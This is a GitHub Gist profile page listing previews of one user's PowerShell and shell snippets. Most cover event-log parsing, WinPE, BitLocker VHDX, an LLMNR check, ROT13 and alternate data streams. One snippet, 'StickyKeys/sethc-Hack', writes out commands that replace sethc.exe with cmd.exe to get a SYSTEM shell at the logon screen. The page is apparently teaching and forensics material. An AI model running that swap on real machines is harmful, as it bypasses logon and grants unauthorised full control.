Skip to content

Instantly share code, notes, and snippets.

View JaekelEDV's full-sized avatar
🎯
Focusing

@JaekelEDV JaekelEDV

🎯
Focusing
29 followers · 74 following
View GitHub Profile
@JaekelEDV
JaekelEDV / ads.ps1
Created February 8, 2022 22:31
ads playground
#Create 'normal' file with some content.
New-Item -Name .\adstest1.txt -ItemType File -Value 'This is normal content.'
#Show content...
Get-Content -Path .\adstest1.txt
#Show Alternate Data Streams - only ':$DATA'
Get-Item -Path .\adstest1.txt -Stream *
#Add ADS named SecretADS with some content
@JaekelEDV
JaekelEDV / osint_links.txt
Created November 19, 2021 14:46
unsorted OSINT links
@JaekelEDV
JaekelEDV / logparser.ps1
Created August 10, 2021 08:34 — forked from exp0se/logparser.ps1
Logparser log parsing
# Logparser
###############
# Security Log
###############
# Find Event id
& 'C:\Program Files (x86)\Log Parser 2.2\LogParser.exe' -stats:OFF -i:EVT "SELECT * FROM 'Security.evtx' WHERE EventID = '5038'"
@JaekelEDV
JaekelEDV / powershell_eventlog_parsing.ps1
Created August 10, 2021 08:34 — forked from exp0se/powershell_eventlog_parsing.ps1
Powershell log parsing
#Security log
#============
####
#4624 - Logon & Logoff events successful
#4625 - Logon unsucceful
####
# Get usernames
Get-WinEvent -path .\Security.evtx | Where {$_.id -eq "4624"} | Foreach {([xml]$_.ToXml()).GetElementsByTagName("Data").ItemOf(5)}| Select -ExpandProperty "#text" -Unique
# Get domains
@JaekelEDV
JaekelEDV / mandatory_level.md
Last active May 1, 2021 14:50
mandatory_level.png

mandatory_levels

@JaekelEDV
JaekelEDV / sethc.txt
Created May 1, 2021 14:42
StickyKeys/sethc-Hack
#StickyKeys/sethc-Hack
#Save sethc.exe to c:\
copy c:\windows\system32\sethc.exe c:\
#Replace sethc.exe with cmd.exe
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
#Reboot and on logon screen press SHIFT 5x -> cmd with SYSTEM-privileges
@JaekelEDV
JaekelEDV / WinPEIso.txt
Created May 1, 2021 14:32
Create WinPE ISO
#Make Windows PE ISO
#https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/winpe-create-usb-bootable-drive
#01 - Install WADK
#02 - If Windows 10 > 1803 also install adkwinpesetup.exe
#https://docs.microsoft.com/en-us/windows-hardware/get-started/adk-install
#03 - Create Working directory
copype amd64 C:\WinPE_amd64
@JaekelEDV
JaekelEDV / New-BitLockerVhdx.ps1
Created February 6, 2021 01:05
New-BitLockerVhdx.ps1
#New-BitLockerVhdx.ps1, create a vhdx, enable BitLocker.
#->Share encrypted data between machines (mount, attach to VMs) and peers (vhdx->Stick)
#All with Windows standard tools.
throw "Nope. This is no script, just a bunch of cmdlets."
#Create a new vhdx
New-VHD -Path .\sec.vhdx -SizeBytes 1GB -Fixed
#Mount the vhdx
@JaekelEDV
JaekelEDV / Test-LLMNR.ps1
Created October 20, 2020 21:44
Test-LLMNR
#Check if LLMNR will be used.
$RegPath = "HKLM:\Software\Policies\Microsoft\Windows NT\DNSClient"
$RegKey = Get-ItemProperty -Path $RegPath | Select-Object -Property 'EnableMulticast'
$RegValue = $RegKey.EnableMulticast
$RegCheck = Test-Path $RegPath
if ($RegCheck -eq $true) {
Write-Host "[+]The settings of $RegPath are $RegKey" -ForegroundColor Yellow
}
if ($RegCheck -eq $false) {
@JaekelEDV
JaekelEDV / ROT13.sh
Created September 17, 2020 20:32
ROT13
#https://en.wikipedia.org/wiki/ROT13
echo "Hail, Caesar!" | tr 'a-zA-Z' 'n-za-mN-ZA-M'
#Unvy, Pnrfne!
echo "Unvy, Pnrfne!" | tr 'a-zA-Z' 'n-za-mN-ZA-M'
#Hail, Caesar!
#To better understand this:
#tr accepts